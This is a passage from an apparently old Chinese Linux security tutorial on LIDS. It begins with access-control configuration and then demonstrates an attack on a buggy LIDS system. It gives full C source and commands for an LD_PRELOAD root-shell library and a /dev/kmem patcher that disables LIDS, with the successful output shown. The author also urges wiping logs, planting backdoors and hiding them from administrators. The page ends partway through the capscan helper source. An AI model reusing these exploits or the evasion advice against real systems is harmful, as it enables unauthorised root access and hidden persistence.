📄 5.html
字号:
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT<p>
# Protect the boot partition<br>
/sbin/lidsconf -A -o /boot -j READONLY<p>
# Protect root's home dir, but allow bash history<br>
/sbin/lidsconf -A -o /root -j READONLY<br>
/sbin/lidsconf -A -s /bin/bash -o /root/.bash_history -j WRITE<p>
# Protect system logs<br>
/sbin/lidsconf -A -o /var/log -j APPEND<br>
/sbin/lidsconf -A -o /var/log/dmesg -j WRITE<br>
/sbin/lidsconf -A -s /bin/login -o /var/log/wtmp -j WRITE<br>
/sbin/lidsconf -A -s /bin/login -o /var/log/lastlog -j WRITE<br>
/sbin/lidsconf -A -s /sbin/init -o /var/log/wtmp -j WRITE<br>
/sbin/lidsconf -A -s /sbin/init -o /var/log/lastlog -j WRITE<br>
/sbin/lidsconf -A -s /sbin/halt -o /var/log/wtmp -j WRITE<br>
/sbin/lidsconf -A -s /sbin/halt -o /var/log/lastlog -j WRITE<br>
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/wtmp -i 1 -j WRITE<br>
/sbin/lidsconf -A -s /etc/rc.d/rc.sysinit -o /var/log/lastlog -i 1 -j WRITE<p>
# Shutdown<br>
/sbin/lidsconf -A -s /sbin/init -o CAP_INIT_KILL -j GRANT<br>
/sbin/lidsconf -A -s /sbin/init -o CAP_KILL -j GRANT<br>
# Give the following init script the proper privileges to kill processes and<br>
# unmount the file systems. However, anyone who can execute these scripts<br>
# by themselves can effectively kill your processes. It's better than<br>
# the alternative, however.<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_INIT_KILL -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_KILL -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_NET_ADMIN -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_ADMIN -i 1 -j GRANT<br>
/sbin/lidsconf -A -s /etc/rc.d/init.d/halt -o CAP_SYS_RAWIO -i 1 -j GRANT<p>
# Other<br>
/sbin/lidsconf -A -s /sbin/update -o CAP_SYS_ADMIN -j GRANT<br>
/sbin/lidsconf -A -s /sbin/consoletype -o CAP_SYS_ADMIN -j GRANT<p>
#Protect and hide Httpd<br>
/sbin/lidsconf -A -o /etc/httpd -j DENY<br>
/sbin/lidsconf -A -s /usr/sbin/httpd -o /etc/httpd -j READONLY<br>
/sbin/lidsconf -A -s /usr/sbin/httpd -o CAP_HIDDEN -j GRANT<br>
---------------------------------------------------------------------------------<br>
运行命令/sbin/lidsadm -S -- -LIDS切换到不受lids保护的状态,然后执行配置脚本,运行命令/sbin/lidsadm -S -- +RELOAD_CONF,更新lids配置,最后lidsadm -S -- +LIDS切换到lids保护状态<br>
通过命令如ls /etc/shadow、ls /etc/lids、touch /sbin/x、ps ax|grep http等命令测试lids保护的文件、目录和进程等;通过扫描器扫描测试lids的检测功能以及lids的响应功能等。最好的办法是模仿黑客成功入侵后所做的活动,如装rootkit等来检验lids的主要功能。<p>
<center><A HREF="#Content">[目录]</A></center>
<hr><br><A NAME="I729" ID="I729"></A><center><b><font size=+2>漏洞测试</font></b></center><br>
2.漏洞测试:<br>
LD_PRELOAD能够编写一个LIDS可执行任意代码的程序,这意味着入侵者能够获得LIDS配置下的权限和文件访问能力,如果用CAP_SYS_RAWIO 或者CAP_SYS_MODULE,入侵者可以停掉LIDS并且获得访问一切文件的权限。 在某些配置下,还能够获得root权限。<p>
可以到下载下面的测试程序:<br>
http://www.lids.org/download/test-lids.sh<br>
http://www.lids.org/download/test-lids.sh.asc<p>
下面开始入侵装有lids的linux,当然该lids是有bug的了。<br>
首先是获得一个普通帐号了,通过finger、sendmail等或是社交工程都可以,相信难不倒各位,只要有个帐号就可以,当然还需要能够远程登录,如果能本机登录就更好了!<p>
[test@rh72 test]$ls /proc/sys<br>
abi debug dev fs kernel lids net proc<br>
[test@rh72 test]$ls /sbin/lids*<br>
/sbin/lidsadm /sbin/lidsconf<br>
--可见该系统安装了lids<p>
[test@rh72 test]$vi testlids.sh<br>
---------------------------------------------------------------------------------<br>
#!/bin/sh<p>
# Creates /tmp/boom.so you might<br>
# use to let LIDS leak capabilities<br>
# to your shell.<p>
cat>/tmp/boom.c<<_EOF_;<br>
#include <stdio.h><br>
#include <unistd.h><br>
#include <fcntl.h><p>
_init()<br>
{<br>
char *a[] = {"/bin/bash", NULL};<br>
setuid(0);<br>
close(0);close(1);close(2);<br>
open("/dev/tty", O_RDWR);<br>
dup(0);<br>
dup(1);<br>
execve(*a,a,NULL);<br>
return -1;<br>
}<p>
_EOF_<p>
cc -c -fPIC /tmp/boom.c -o /tmp/boom.o<br>
ld -Bshareable /tmp/boom.o -o /tmp/boom.so<br>
echo "OK";<br>
---------------------------------------------------------------------------------<br>
[test@rh72 test]$ chmod +x testlids.sh<br>
[test@rh72 test]$ ./testlids.sh<br>
OK<br>
[test@fire lids]$ LD_PRELOAD=/tmp/boom.so /bin/login<br>
[root@fire lids]# whoami<br>
root<br>
哇塞,这么容易就获得root权限了,比没有装lids的linux更容易,真爽!:)<br>
可见,普通用户通过LD_PRELOAD可以直接从装有存在bug的lids的系统中获得超级用户权限,所以安装lids的管理员一定要注意升级和配置lids。<p>
(之所以通过/bin/login直接获得root权限是因为采用如下的lids配置命令<br>
/sbin/lidsconf -A -s /bin/login -o CAP_SETUID -j GRANT<br>
/sbin/lidsconf -A -s /bin/login -o CAP_SETGID -j GRANT<br>
/sbin/lidsconf -A -s /bin/login -o CAP_CHOWN -j GRANT<br>
/sbin/lidsconf -A -s /bin/login -o CAP_FSETID -j GRANT )<p>
[root@fire lids]# ./capscan -b (capscan用来探测lids的功能约束)<br>
b 5 CAP_KILL<br>
[root@fire lids]# touch /sbin/xlids<br>
touch: /sbin/xlids: Operation not permitted<br>
[root@fire lids]#LD_PRELOAD=/tmp/boom.so /etc/rc.d/init.d/halt<br>
[root@fire lids]# ./capscan -b<br>
b 5 CAP_KILL<br>
b 12 CAP_NET_ADMIN<br>
b 17 CAP_SYS_RAWIO<br>
b 21 CAP_SYS_ADMIN<br>
b 27 CAP_MKNOD<br>
--可见我们已经从halt脚本获得了CAP_NET_ADMIN、CAP_SYS_RAWIO和CAP_SYS_ADMIN功能<br>
[root@fire lids]# touch /sbin/xlids<br>
touch: /sbin/xlids: Operation not permitted<br>
[root@fire lids]# ls -al /etc/lids<br>
ls: /etc/lids: No such file or directory<br>
[root@fire lids]# /sbin/lidsconf -L<br>
LIST<br>
LIDS: lidsconf(dev 3:1 inode 150018) pid 630 ppid 581 uid/gid (0/0) on (vc/1):<br>
access hidden file /etc/lids/lids.conf<br>
lidsconf:cannot open /etc/lids/lids.conf<br>
reason: No such file or directory<br>
--可见lids仍起作用,并对/sbin和/etc/lids作了保护,其中/sbin作了只读保护,/etc/lids拒绝访问<br>
[root@fire lids]#vi lidsoff.c<br>
---------------------------------------------------------------------------------<br>
#lidsoff.c: //主要是将内核中的变量lids_load置为0<p>
/* Simple and stupid kmem patcher for LIDS.<br>
* Licensed under the GPL. :-)<br>
*/<br>
#include <stdio.h><br>
#include <unistd.h><br>
#include <fcntl.h><br>
#include <errno.h><br>
#include <stdlib.h><p>
void die(const char *s)<br>
{<br>
perror(s);<br>
exit(errno);<br>
}<p>
<br>
int main(int argc, char **argv)<br>
{<p>
char zero;<br>
off_t off;<br>
int kmem;<p>
if (argc < 2) {<br>
printf("Usage: %s <addr-of-lids_local_on-in-hex>\n\n", *argv);<br>
return 1;<br>
}<p>
kmem = open("/dev/kmem", O_RDWR);<br>
if (kmem < 0)<br>
die("open");<p>
off = strtoul(argv[1], 0, 16);<br>
printf("# Patching [%x]\n", off-4);<p>
lseek(kmem, off-4, SEEK_SET);<br>
read(kmem, &zero, sizeof(zero));<br>
printf("%d -> 0\n", zero);<p>
lseek(kmem, off-4, SEEK_SET);<br>
zero = 0;<br>
write(kmem, &zero, sizeof(zero));<br>
close(kmem);<br>
return 0;<br>
}<br>
---------------------------------------------------------------------------------<br>
[root@fire lids]# gcc -o lidsoff lidsoff.c<br>
[root@fire lids]# grep lids /proc/ksyms<br>
c0113868 lids_send_message_Rsmp_ccaa3a65<br>
c029af60 lids_load_Rsmp_a57ab5ad<br>
c029af64 lids_local_on_Rsmp_641824fe<br>
c029af6c lids_local_pid_Rsmp_2a2dd337<br>
c0129270 lids_local_off_Rsmp_445f75c1<br>
[root@fire lids]# ./lidsoff<br>
Usage: ./lidsoff <addr-of-lids_local_on-in-hex><br>
[root@fire lids]# ./lidsoff c029af64<br>
# Patching [c029af60]<br>
1 -> 0<br>
哈哈, lids已经关闭了,不再起作用了!<br>
[root@fire lids]# ls /etc/lids/lids.conf<br>
/etc/lids/lids.conf<br>
[root@fire lids]# touch /sbin/xlids<p>
至此,已经完全控制了装有lids的linux,很easy是吧,最后别忘了擦脚印、装后门。当然可以利用lids隐藏后门程序目录和进程了,连rootkit都可以省了。完事后切换lids的状态,不然管理员很容易就发现入侵了。不过受害机器的控制台上可能会有一些警告显示,最好是重起或者用一些扫描信息替换掉!:)<br>
<center><A HREF="#Content">[目录]</A></center>
<hr><br><A NAME="I727" ID="I727"></A><center><b><font size=+2>附录</font></b></center><br>
lids解决办法:<p>
对于2.4用户:<br>
http://www.lids.org/download/lids-1.1.1pre2-2.4.16.tar.gz<br>
http://www.lids.org/download/lids-1.1.1pre2-2.4.16.tar.gz.asc<br>
(或者lids-1.1.1pre2以后的版本)<p>
对于2.2用户:<br>
http://www.lids.org/download/LIDS-security-patch-0.10.1-2.2.20.diff.gz<br>
http://www.lids.org/download/LIDS-security-patch-0.10.1-2.2.20.diff.gz.asc<br>
(或者lids-0.11.0以后的版本)<p>
附capscan 源程序:<br>
--------------[ stealth <stealth@segfault.net> ]--------------------------------<br>
#cap.h<br>
---------------------------------------------------------------------------------<br>
#ifndef __cap_h__<br>
#define __cap_h__<p>
#include <linux/capability.h><p>
typedef struct __user_cap_header_struct cap_user_header;<br>
typedef struct __user_cap_data_struct cap_user_data;<p>
int capget(cap_user_header_t,cap_user_data_t);<br>
int capset(cap_user_header_t,cap_user_data_t);<br>
int print_cap(cap_user_data_t, cap_user_data_t);<p>
int brute_caps();<p>
#endif<br>
---------------------------------------------------------------------------------<br>
# cap.c<br>
---------------------------------------------------------------------------------<br>
#include <stdio.h><br>
#include <string.h><br>
#include <unistd.h><br>
#include <fcntl.h><br>
#include <stdlib.h><br>
#include <sys/types.h><br>
#include <sys/socket.h><br>
#include <netinet/in.h><br>
#include <signal.h><br>
#include <sys/ioctl.h><br>
#include <net/if.h><br>
#include <linux/module.h><br>
#include <errno.h><br>
#include <sys/ptrace.h><br>
#include <sys/stat.h><br>
#include "cap.h"<p>
extern int wait(int *);<p>
int try_chown()<br>
{<br>
char p[] = "/tmp/fooXXXXXX";<br>
int r, fd = mkstemp(p);<br>
if (fd < 0)<br>
return 0;<br>
close(fd);<p>
/* try a give-away */<br>
if (chown(p, getuid()+1, getgid()+1) < 0)<br>
r = 0;<br>
else<br>
r = 1;<p>
unlink(p);<br>
return r;<br>
}<p>
<br>
int try_setuid()<br>
{<br>
int euid = geteuid();<p>
if (seteuid(euid + 1) < 0)<br>
return 0;<p>
seteuid(euid);<br>
return 1;<br>
}<p>
<br>
int try_setgid()<br>
{<br>
int egid = getegid();<p>
if (setegid(egid + 1) < 0)<br>
return 0;<p>
setegid(egid);<br>
return 1;<br>
}<p>
<br>
int try_kill()<br>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -